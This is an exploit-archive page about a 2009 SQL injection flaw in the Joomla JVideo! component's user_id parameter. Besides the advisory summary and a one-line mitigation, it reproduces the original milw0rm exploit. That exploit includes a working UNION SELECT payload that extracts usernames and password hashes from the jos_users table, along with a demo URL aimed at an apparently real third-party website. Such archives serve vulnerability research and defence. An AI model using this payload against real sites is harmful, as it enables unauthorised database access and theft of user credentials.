header-logo
Suggest Exploit
vendor:
JVideo! Component
by:
Chip D3 Bi0s
7,5
CVSS
HIGH
SQL injection
89
CWE
Product Name: JVideo! Component
Affected Version From: 0.3.11c Beta
Affected Version To: 0.3.11c Beta
Patch Exists: NO
Related CWE: N/A
CPE: a:infinovision.com:jvideo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component com_jvideo (user_id) SQL-injection Vulnerability

A SQL injection vulnerability exists in Joomla Component com_jvideo, which can be exploited by malicious people to conduct SQL injection attacks. The vulnerability is caused due to the user_id parameter in the index.php script not being properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow execution of arbitrary SQL code in the context of the database user.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_jvideo (user_id) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###################################################
[+] Author        :  Chip D3 Bi0s
[+] Greetz        :  d4n!ux + x_jeshua + eCORE + Painboy + rayok3nt + 3l3cTron1k_0
[+] Vulnerability :  SQL injection
[+] Google Dork   :  imagine ;)
--------------------------------------------------
author       :     Russell...
author Email :     chipdebios[alt+64]gmail.com

###################################################

Example:
http://localHost/path/index.php?option=com_jvideo&view=user&user_id=62[SQL code]


SQL code:
+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users


DEMO:


http://www.mosessite.com/index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users

etc, etc....
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

<name>JVideo!</name>
<creationDate>September 2008</creationDate>
<author>Infinovision.com</author>
<authorEmail>team@infinovision.com</authorEmail>
<authorUrl>http://www.infinovision.com</authorUrl>
<copyright>Copyright 2008 Infinovision.com</copyright>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<version>0.3.11c Beta</version>
<description>JVideo! Component</description>

# milw0rm.com [2009-05-29]

Navigation

Suggest Exploit

Services By CQR